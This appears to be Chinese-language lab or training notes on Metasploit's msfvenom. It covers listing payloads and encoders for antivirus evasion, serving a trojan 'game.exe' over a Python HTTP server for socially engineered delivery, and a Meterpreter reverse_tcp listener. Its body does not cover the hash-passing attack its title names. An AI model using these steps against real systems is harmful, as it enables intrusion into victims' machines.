经典攻击示范–离线攻击–HASH值传递
Msfvenom
Msfvenom 是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayload和MsfEncode这两个工具。
The advantages of msfvenom are(优点):
- One single tool (一个单一的集成工具)
- Standardized command line options (命令行选项标准化)
- Increased speed (优化速度)
Msfvenom 查看Payload
查看msf支持的payload列表:
#msfvenom -l payloads
Msfvenom查看输出格式
查看msf支持的payload输出格式:
#msfvenom -help-formats
*即使我们不知道目标系统存在哪些漏洞,如果我们能够将攻击载荷放在目标系统中,也是能够获取目标系统的权限的。
Msfvenom编码
查看msf支持的编码器:
#msfvenom -l encoders
*选择不同的编码方式用于逃避AV的检查。
Msfvenom生成game.exe
传输木马到Windows 7:
*在这里使用简单的方法,Kali启用HTTP服务器,Windows 7通过网页访问Kali下载木马文件。
python -m SimpleHTTPServer 808
*在哪个目录下启用HTTP服务,该目录就为分享文件的根目录。
传输木马到Windows 7(此处需要社会工程学)
Msfvenom
开始监听连入的目标流量:
>use exploit/multi/handler
>set payload windows/meterpreter/reverse_tcp
>set lhost 202.100.1.220
>set lport 4444
>exploit